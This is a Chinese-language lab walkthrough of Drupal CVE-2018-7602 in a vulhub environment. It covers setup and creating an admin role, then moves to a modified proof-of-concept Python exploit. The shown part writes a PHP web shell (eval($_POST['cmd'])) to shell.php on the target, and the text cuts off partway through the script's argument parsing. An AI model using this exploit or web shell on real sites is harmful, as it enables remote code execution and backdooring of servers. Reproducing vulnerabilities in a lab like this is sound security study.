0x01 环境搭建
建立vulhub/drupal/CVE-2018-7602/环境
0x02 创建角色
给该网页创建一个网站管理员角色
登录初始管理员,授予权限给新建角色
设置完毕并保存后该新建的管理员角色就已激活
0x03 反弹shell连接
使用以下poc.py,与官网不同的是强制定义命令为 echo '<?php eval($_POST["cmd"]);echo "get shell";?>' > shell.php
,因为如果使用原poc执行语句python3 poc.py -c "echo '<?php eval($_POST["cmd"]);echo "get shell";?>' > shell.php" drupal drupal http://靶机IP:8081/
会导致输入错误等等原因,所以进行了一点修改
#!/usr/bin/env python3
import requests
import argparse
from bs4 import BeautifulSoup
def get_args():
parser = argparse.ArgumentParser( prog="drupa7-CVE-2018-7602.py",
formatter_class=lambda prog: argparse.HelpFormatter(prog,max_help_position=50),
epilog= '''
This script will exploit the (CVE-2018-7602) vulnerability in Drupal 7 <= 7.58
using an valid account and poisoning the cancel account form (user_cancel_confirm_form)
with the 'destination' variable and triggering it with the upload file via ajax (/file/ajax).
''')
parser.add_argument("user", help="Username")
parser.add_argument("password", help="Password")
parser.add_argument("target", help="URL of target Drupal site (ex: http://target.com/)")
parser.add_argument("-c", "--command", default="id", help="Command to execute (default = id")
parser.add_argument("-f", "--function", default="passthru", help="Function to use as attack vector (default = passthru)")
parser.add_argument("-x", "--proxy", default=